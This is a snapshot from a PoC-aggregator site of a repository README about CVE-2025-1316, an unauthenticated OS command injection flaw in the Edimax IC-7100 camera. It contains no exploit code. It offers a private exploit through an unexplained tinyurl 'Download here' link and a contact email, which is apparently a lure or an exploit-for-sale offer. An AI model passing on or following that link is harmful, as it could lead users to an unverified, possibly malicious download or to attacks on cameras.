POC详情: baf3ad97e91bfa58ca7875f28d7e4566654e91ea

来源
关联漏洞
标题: 艾德维斯 IC-7100 IP 摄像头操作系统命令注入漏洞 (CVE-2025-1316)
描述:Edimax IC-7100设备未能正确中和请求。攻击者可以通过构造特定的请求在设备上实现远程代码执行。
描述
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') (CWE-78)
介绍
# CVE-2025-1316
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') (CWE-78)
## Overview
A critical vulnerability in the Edimax IC-7100 network camera where the device fails to properly neutralize incoming requests, enabling remote code execution through specially crafted requests.

## Details
+ **CVE ID**: CVE-2025-1316
+ **Published**:03/04/2025

+ **Impact**: Critical
+ **Exploit Availability**: Not public, only private.
+ **CVSS**: 9.3
## Impact
An unauthenticated attacker can completely compromise the network camera, potentially: - Executing arbitrary remote code - Gaining full control of the camera - Accessing, modifying, or disabling camera systems - Potentially leveraging the device as an entry point into connected networks


## Affected Versions
Edimax IC-7100 network camera
## Contact
+ **For inquiries, please contact:LeronTavish@outlook.com**

 ## Exploit
+ **[Download here](https://tinyurl.com/bdfx97me)**
文件快照

[4.0K] /data/pocs/baf3ad97e91bfa58ca7875f28d7e4566654e91ea └── [ 970] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。